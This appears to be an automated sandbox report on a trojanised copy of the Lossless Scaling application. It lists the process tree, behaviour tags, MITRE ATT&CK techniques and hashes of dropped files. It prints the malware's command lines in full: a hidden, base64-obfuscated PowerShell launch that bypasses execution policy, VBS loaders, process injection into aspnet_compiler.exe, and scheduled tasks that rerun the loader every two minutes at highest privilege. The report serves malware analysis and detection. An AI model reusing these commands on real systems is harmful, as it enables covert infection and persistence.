C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps13⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
PID:4308
-
-
C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1872
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator4⤵PID:3500
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn Backup14⤵PID:4048
-
-
C:\Users\Public\IObitUnlocker\RAR.exe"C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\4⤵
- Executes dropped EXE
PID:2404
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"4⤵PID:1368
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3440 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:236
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator6⤵PID:3356
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"4⤵PID:4052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- System Location Discovery: System Language Discovery
PID:3664
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator6⤵PID:4184
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn administrator /sc minute /mo 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /rl HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:1524
-
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn Backup14⤵PID:2316
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1980
-
-
C:\Windows\system32\Dism.exe"C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx34⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3548 -
C:\Users\Admin\AppData\Local\Temp\413F1548-E3CD-4A77-8710-B770E24303D7\dismhost.exeC:\Users\Admin\AppData\Local\Temp\413F1548-E3CD-4A77-8710-B770E24303D7\dismhost.exe {CA4023FC-195E-4366-9BE1-691657416174}5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2416
-
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap4613:62:7zEvent30320 -tzip -sae -- "C:\Users\Public\IObitUnlocker.zip"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4792
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\IObitUnlocker\Loader.vbs"1⤵PID:1320
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:768 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
PID:3544
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵PID:2268
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\IObitUnlocker\Loader.vbs"1⤵PID:2968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵PID:5092
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2924
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵PID:3680
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\IObitUnlocker\Loader.vbs"1⤵PID:3384
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2924 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵PID:2344
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2740
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵PID:200
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\IObitUnlocker\Loader.vbs"1⤵PID:972
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3136 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4624
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator3⤵PID:1384
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Impair Defenses (1)
  - Disable or Modify Tools (1)
- Modify Registry (2)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize648B
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize2KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\LosslessScaling.exe.config
Filesize174B
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ar\LosslessScaling.resources.dll
Filesize24KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\bg\LosslessScaling.resources.dll
Filesize25KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\cs\LosslessScaling.resources.dll
Filesize20KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\de\LosslessScaling.resources.dll
Filesize18KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\es-ES\LosslessScaling.resources.dll
Filesize20KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\fa\LosslessScaling.resources.dll
Filesize27KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\fr\LosslessScaling.resources.dll
Filesize21KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\he\LosslessScaling.resources.dll
Filesize22KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\hr\LosslessScaling.resources.dll
Filesize19KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\id\LosslessScaling.resources.dll
Filesize19KB
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\it\LosslessScaling.resources.dll
Filesize20KB
MD54216eb3bcff34d8bf807ba9ae2329400
SHA19e3104f0caba8c9721720e24991e2ff767269fa6
SHA256961fe22ac5b8226e13161868c2af0de3700a157b3ec14a8036e6c85f0c38e158
SHA512d6551d03794594f9e9a602232d2ece63eb3ca26338949cc6684eefa1f2ddc9eb6fdd2a35b20410dd7978612d399ab882cc72ccd5b82097c9ce07b4ac7840fd72
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ja\LosslessScaling.resources.dll
Filesize25KB
MD5c7a79602e51c7d382027d9cc4f4d9765
SHA1cbcdfd3cdad01eba053b0bb7251876e218011764
SHA256a2596374f8b643e4e4ac7d722a8f7ac83f9d315ab45bfa61074bf874651471bb
SHA51277020357d3ea423a4508b7219bd0406be95c3344859d3099c515e65b00c1e1a1e1b19b1114fad86c60531a5a1b3ff773169dea2c17d694fe4eda4ae52adf3025
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ko\LosslessScaling.resources.dll
Filesize21KB
MD5f672890a2c8cfff5437ad16c4de614e6
SHA1ab869398470f3564920d8b6166730f8097fe64d9
SHA25681c8f6a0707331452dc857f5c67aa776bd7a6ac5c5af7b82fb554cf8815150c9
SHA512e40c8fad07dc8c02315251be9bbb0e475eb5a334e56a156b9418ba107c22e1311ffe08f7b380e2ffe9204b632e370a2c92be07578e38678097faeb5f648055b8
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\lt\LosslessScaling.resources.dll
Filesize18KB
MD523a9ec7c06004508d633a4c028acc355
SHA14143dad93782505fde5ee5903cd8da2716861b35
SHA2561b5151d2b5587ddebf3f84681ab917432e84bdabcb474c80ae8ca835373f66ba
SHA512777eb6d4666d4a9e69d2ec567df7acba97dbb28de00ea89d6bce54bf087bed9102e45aec26fe3ee07629acfc0bd72c557ebff0d213621ff619b70e9ffd1329c9
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\pl\LosslessScaling.resources.dll
Filesize20KB
MD5204bb095c3b6f2dd1900864515cf4396
SHA12c9585abc0e7141a605a727482c13aebe9511e19
SHA25684c89ef89af6099fa5b54e91e19c2e01c56ab0dc7c2cccc71a70465d1c0d5b0d
SHA512f546de9e27330f040c39c87f298b0bf7da480593619a978ab060192a72c0920a39979317268b88ae06dcdc7245aff26d229a118efd8deebc02ce8e630f0cf4a9
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\pt-BR\LosslessScaling.resources.dll
Filesize20KB
MD5b55ecbe34dbc613abfbdc8d57c2071b1
SHA11120bfc3fadab03e517f6bbc7f889ec3c5240572
SHA2562a993509736e479192fab00b8891720cce160027c0b2d4f1de972418d63b32d0
SHA512bb6caeb9e340c3c9f0915f55f39953d33ccc79fb5db89aa1bad8b2d19dfa59fed5bd156e7b1f440f48c2c0a37267da8cc9818f22912386221959f928ee7a4864
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\pt-PT\LosslessScaling.resources.dll
Filesize21KB
MD5ab3cde5ecc06776aca93dde3736c0015
SHA1b3ed86db4c026facc759185c02b62f2d4a20630d
SHA2561cbda2b28cef36d4af5806d5f22bdbd68ef04beed390b17fdde5e59fdb1b54eb
SHA5126c21c007ca3fad6e13baca82e04ea3b66db2c6cd698406dd6f03bf873beed9df885e88431c994e1047db42cab02278cc6cf03b28e3a85fdbe693780d77864e96
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\ro\LosslessScaling.resources.dll
Filesize20KB
MD5850d62f8f539b0bfa98237f603051b69
SHA1d7b28e068861c83ae689627f46ca39a32844a3c5
SHA2562624ea6a9a03f7ef41e011cc29efbcbc3d1b330a0903634e7a8c8f4b413cbc5b
SHA5124c2dc192d6eae695f223e1475bb26533c56f63fa0d77107ba5965892acf3fc7ef998b445b9ad7310324725f70f9790f9e92b6b99d9d960f360bb9ba75799ae23
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\sr-Latn\LosslessScaling.resources.dll
Filesize19KB
MD5582057f55647898e751a20e1800ee70b
SHA1a57b958478eca835230fcec3391fb076e79c9611
SHA256fef9fd58c457510844eecc4c6a868dbcb41855560301c4270c5478a9c64c3987
SHA51217301d317e692fd66114742ea3e971214b8fab9932ac3ceeb555e57954115c14de3fa142fb1100d851d26839907218e5e3a7db30316059872ea9b296f20dabe0
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\tr\LosslessScaling.resources.dll
Filesize20KB
MD521a59e82a064b4c4ae687a1965762f57
SHA1abd852cdb1d294a68e4bae8d1563d2954f98073a
SHA256836579c9cbe44121211c074a99dadafa78cb8c3731ec2e4efc258368cae544df
SHA5120027ae3ce2cddac83b64a4b7ca2d4ecbeebe3d5466ed7d94af020a80b6a11b14c0c55ba2af9dbdc3b6c290f38a72657e25761c5864a35fa54cc5b536bd1525d7
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\uk\LosslessScaling.resources.dll
Filesize27KB
MD507b5cdd450698660bddab7b89929eafb
SHA1e08490c84ac52f9a6157dbfa915c621afbfa5a65
SHA2564db3e2cdd1878c0d025b0a9d69dd0531574c4e8ac314a554c1d7ae7a943d8bfc
SHA512aad5c708e642ef7c9a2c2a498097c4a376e07bbd714d0627716da5b0892285117b401f9bf75f2f37203b7f0269ea785c337af161cf10a7d064c34d9db7afa8eb
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\vi\LosslessScaling.resources.dll
Filesize20KB
MD5174c893876a8b9fe092c675f2e7866de
SHA1d871fef312834e7ea8d772d7d9f36c2590701319
SHA256c4ed2b38efff02d56fe184ec420eaf7145091c039e2c4fe09bc7bb85ea399c60
SHA5125f17d96ba754b1bc493e674eb9bc65f8fcfe2b7952dfa7ad70cc7dd29d935e3354a8ac54954ee4be1cbe762a10d4731065bc099bd1aab746f5acaef76068ce90
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\zh-CN\LosslessScaling.resources.dll
Filesize17KB
MD56fb2ddb689455948d49f13e47903808f
SHA1dde68a02b3351b135d8b124451fa168f32ef47c7
SHA25648208349a891b0168e662884a339ba41945254aa4f7a69009db3fd8959ffcf5a
SHA512c73587aef1eb2f34f1c17316c7e8732bfd8b33d1fda16ee40e9c65cdc2f778bc368641e00026d277d17af66d4ebb9a0e70e32ed6881b8f2cfb4d5df786518673
-
C:\Users\Admin\Downloads\lossless scaling\lossless scaling\language\uk-UA\zh-TW\LosslessScaling.resources.dll
Filesize17KB
MD537f6c40defabf6b52616e77e588efae4
SHA169b0ec19792a2367fc72b84721a78a99c18f9c95
SHA25693e95c9831f8baa3d295f61172930951220e3cf881a85f51cb76e3727562ad53
SHA512a306954a492ef89dad9d9b69cdc16234a35517f191ad67356558b6dba417656a0635b4aaee6ca2b985196c6d5141212138c2579b98cf2f08f11d4d5b8d1e0252
-
Filesize
1KB
MD5ef493142e81e5552a0ffd2d240b8f0e9
SHA187479ebb8e82b4e8447ee5bcbdcd4329bb5204b0
SHA2560c22b40a3588c88b561e80e5fca90274cf1f962d53fbfa321647c58e6b81e42f
SHA5120131a9f438f014f8b443033dc2c47efc0b35f4ac08b954edfeb2549f43099c751ebaa699c07d1a903d9413463f86bb96586e4737753cca021fc21fce8514b347
-
Filesize
288KB
MD5d74be7c1ee7a469c1911fc331541edf1
SHA13060ef10d3eb22186c4a9834549d6aefc140f0f9
SHA25673c8833e156c1b2c0b2f7aafc3c021ccb9bb174534e88cab787d8de149d0fc6f
SHA512b05a8014590debc1e56a474c46e59d996dceb40722702baf22de264fe38ef63b5e9019b812f4b341420f59d3280c70c85092b92adbfa8bb902070a876eeec38a